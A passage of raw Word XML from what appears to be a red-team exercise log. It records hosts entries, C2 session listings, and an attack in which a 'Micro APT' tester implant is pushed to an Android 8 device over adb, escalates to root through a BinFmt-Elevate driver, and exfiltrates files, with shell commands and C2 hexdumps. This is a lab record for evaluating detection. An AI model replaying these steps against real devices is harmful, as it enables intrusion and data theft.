      </w:pPr>
      <w:r>
        <w:t>128.55.12.64            ta3-starc-6-dp kafka-6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459D30F2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.56            ta1-fivedirections-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6B8EA7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10.0.4.2                files.tc.bbn.com devel.tc.bbn.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4C753C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.115           ta1-theia-replay-marple-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3A4D19" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.85            ta1-theia-database-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAC8ACE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.112           ta1-theia-analysis-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1855C8B2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.110           ta1-theia-target-1-dp ta1-theia-target-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E010F8F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.51            ta1-cadets-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BEB1F2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.119           ta1-theia-target-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BD7851" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.111           ta1-theia-target-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BD8861" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2025B99F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.111           ta1-theia-target-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624ECE12" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0444630E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W4&gt;main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E98D3BF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5800210C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W4        128.55.12.167:51590 --&gt;   128.55.12.167:8110  [HTTP]  Fri May 17 16:14:32 2019        active 105s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1800C153" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W3        128.55.12.167:51589 --&gt;   128.55.12.167:8110  [HTTP]  Fri May 17 16:14:25 2019        active 112s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70053935" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W2        128.55.12.167:51588 --&gt;   128.55.12.167:8110  [HTTP]  Fri May 17 16:12:33 2019        DEAD 112s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F988A09" w14:textId="2306FC30" w:rsidR="005A0BE6" w:rsidRPr="00650FDF" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W1        128.55.12.167:51587 --&gt;   128.55.12.167:8110  [HTTP]  Fri May 17</w:t>
      </w:r>
      <w:r w:rsidR="00650FDF">
        <w:t xml:space="preserve"> 16:12:31 2019        DEAD 125s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD8E8A4" w14:textId="48EDF4CF" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="263" w:name="_Toc12600149"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>16:20 -- ClearScope 1 -- Tester Micro APT BinFmt-Elevate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="263"/>
    </w:p>
    <w:p w14:paraId="0561CC80" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The attacker once again used ta1-pivot-2 for C2 tools on the target network.  Since the previous test failed to run Micro APT by dropping it to disk from an APK (Appstarter), we decided to run the tester Micro APT directly from an adb shell in /data/local/tmp.  While this was not our first choice, it was our last alternative in the short time remaining as the dropper APK was not working as expected.  The first time we ran tester, we realized adb shell was already running as root and we would not be able to test privilege escalation.  So, we quit the C2 session and reran the tester executable as the shell user.  This time, we were able to use the BinFmt Elevate driver to gain root access.  We then exfil’ed some files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EEF3CA" w14:textId="7E0B4223" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="264" w:name="_y40h4fn56iv4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="265" w:name="_Toc12600150"/>
      <w:bookmarkEnd w:id="264"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="265"/>
    </w:p>
    <w:p w14:paraId="510B4314" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-pivot-2</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128.55.12.233</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Ubuntu 14.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38194709" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-clearscope-translate</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.54</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>Android 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC6E5E8" w14:textId="537F5D62" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="266" w:name="_ila8ye9enti6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="267" w:name="_Toc12600151"/>
      <w:bookmarkEnd w:id="266"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="267"/>
    </w:p>
    <w:p w14:paraId="356ED39E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Tester (Micro APT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B9222C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>BinFmt-Elevate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1460E0A8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="268" w:name="_84sf24anbipw" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="269" w:name="_Toc12600152"/>
      <w:bookmarkEnd w:id="268"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Benign Activity Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="269"/>
    </w:p>
    <w:p w14:paraId="63974B72" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ scp tester user@128.55.12.54:. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E363A04" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>user@128.55.12.54's password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415C90FB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">tester                                                                                             100%  131KB 131.5KB/s   00:00   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1732CBBF" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12BF1AB5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>16:20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48704DB2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ ls             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17618B7F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Android              firefox4980.apk                ingestor-2019-04-23-18:27.log  ingestor-2019-05-09.log      screencap-instr.apk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143134D9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">CDM                  ingestor-2019-04-09-13:02.log  ingestor-2019-04-24-18:10.log  ingestor-2019-05-15.log      tester               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC514AA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">TC                   ingestor-2019-04-11-17:24.log  ingestor-2019-05-03-18:47.log  lockwatch-instr.apk                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B6A190" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">barephone-instr.apk  ingestor-2019-04-12-13:55.log  ingestor-2019-05-03-19:14.log  regression-2019-04-04-21:04                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E60E90D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">cs-setup             ingestor-2019-04-23-15:35.log  ingestor-2019-05-07-12:53.log  regression-latest    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D98C76" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ adb push tester /data/local/tmp   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EE648F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">tester: 1 file pushed. 6.9 MB/s (134648 bytes in 0.019s)   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9485B0" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ adb shell                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D96C35" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">walleye:/ # cd data/local/tmp                                                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A18FABB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">walleye:/data/local/tmp # ls                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B57AABA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">a64.ko calllog.db external.db internal.db msm_g711tlaw.ko swap tc tester   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3D96C3" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ECD6D9C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>16:21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F2F169" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">walleye:/data/local/tmp # ls -la tester                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768F9876" w14:textId="121A0F10" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>-rwxrwxrwx 1 root root</w:t>
      </w:r>
      <w:r w:rsidR="00650FDF">
        <w:t xml:space="preserve"> 134648 2019-05-17 20:19 tester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78697B5F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRPr="002D1168" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="270" w:name="_Toc12600153"/>
      <w:r w:rsidRPr="002D1168">
        <w:t>Event Log 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="270"/>
      <w:r w:rsidRPr="002D1168">
        <w:t xml:space="preserve">                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AEE4AD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/data/local/tmp # ./tester                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D876963" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE2B8B5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@ta51-pivot-2:~/tmp/microapt$ sudo python c2.py 80                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD4DC03" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">waiting for connection on port 80                                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730913E9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">waiting for micro apt (ctrl+c to break from loop)                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4DD405" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">connection from (send quit to disconnect micro-apt) ('128.55.12.166', 40210)                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACB9FC1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x00\x00\x00\x00' (8 bytes)                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BC8416" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 00 00 00 00                          ........                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B23F2B8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D235590" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 92 00 00 00 01 00 00 00 00 00 00 00 7A 00 00 00  ............z...                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9636A7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 7A 00 00 00 00 00 00 00 6F 73 3A 0A 3D 3D 3D 0A  z.......os:.===.                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BB6721" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 2D 61 6E 64 72 6F 69 64 2D 61 72 6D 36 34 0A 75  -android-arm64.u                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10703B40" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000030: 6E 61 6D 65 3A 0A 3D 3D 3D 3D 3D 3D 0A 4C 69 6E  name:.======.Lin                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9DCD0F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000040: 75 78 20 6C 6F 63 61 6C 68 6F 73 74 20 34 2E 34  ux localhost 4.4                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD084E1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000050: 2E 38 38 2D 67 62 34 33 31 30 33 31 37 20 23 31  .88-gb4310317 #1                                                          </w:t>
      </w:r>
    </w:p>
